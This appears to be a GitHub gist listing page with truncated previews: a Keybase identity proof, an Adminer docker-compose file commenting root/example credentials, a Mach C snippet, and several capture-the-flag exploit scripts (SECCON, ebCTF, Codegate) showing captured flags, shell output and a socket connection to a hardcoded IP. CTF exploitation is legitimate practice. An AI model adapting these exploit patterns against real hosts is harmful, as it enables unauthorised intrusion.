I hereby claim:
- I am xelenonz on github.
- I am xelenonz (https://keybase.io/xelenonz) on keybase.
- I have a public key ASAWOIPfCLXz6CcY8lwUZ37TqAM21XLEf5jBWEugzuEIhgo
To claim this, I am signing this object:
# Use root/example as user/password credentials | |
version: '3.1' | |
services: | |
adminer: | |
image: dockette/adminer:latest | |
restart: always | |
ports: |
I hereby claim:
To claim this, I am signing this object:
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <signal.h> | |
// mach | |
#include <mach/mach_types.h> | |
#include <mach/mach_init.h> | |
#include <mach/task.h> | |
#include <mach/mach_traps.h> | |
#include <mach/mach_interface.h> |
""" | |
$ cat flag | |
SECCON{3nj0y_my_jmp1n9_serv1ce} | |
$ | |
""" | |
from pwn import * | |
from time import * | |
import re | |
g_name = re.compile("(.*)1. Add student.") |
#include "../common/common.c" | |
#include <task.h> | |
#define STACK (4096 * 8) | |
unsigned int hash(unsigned char *str, int length, unsigned int mask) | |
{ | |
unsigned int h = 0xfee13117; | |
int i; |
""" | |
$python pwn300.py | |
Interact | |
cat goproot/FLAG | |
0h my g0d, I am defeat. | |
Here, take this: | |
ebCTF{35a6673b2243c925e02e85dfa916036f} |
#!/usr/bin/perl | |
print "\n[*] ebCTF BIN 200\n". | |
" No comment...\n\n"; | |
$secret = "Sup3RSeCr3tStuFf!"; | |
print "[*] What is the secret? "; | |
$answer = <STDIN>; | |
chomp($answer); |
""" | |
$python vuln200.py | |
[+] send pwning payload (Stage 1) | |
[+] Execute Shell (Stage 2) | |
uid=1001(codegate2013) gid=1001(codegate2013) groups=1001(codegate2013) | |
""" | |
import socket,time | |
from struct import pack | |
sk = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
host = "58.229.122.19" |
; buffer = rbp-0x128 | |
; name = rbp-0x110 | |
400d08: 55 push rbp | |
400d09: 48 89 e5 mov rbp,rsp | |
400d0c: 48 81 ec 30 01 00 00 sub rsp,0x130 | |
400d13: 48 89 bd d8 fe ff ff mov QWORD PTR [rbp-0x128],rdi | |
400d1a: 64 48 8b 04 25 28 00 mov rax,QWORD PTR fs:0x28 | |
400d21: 00 00 | |
400d23: 48 89 45 f8 mov QWORD PTR [rbp-0x8],rax | |
400d27: 31 c0 xor eax,eax |
import socket,sys,time,re | |
""" | |
$python skool.py | |
libc_base : 0x840000 | |
shell_base : 0x804c11c | |
Exploit... | |
uid=1003(back2skool) gid=1003(back2skool) | |
""" | |
def readPos(index): | |
sk.send("read\n");sk.recv(10240) |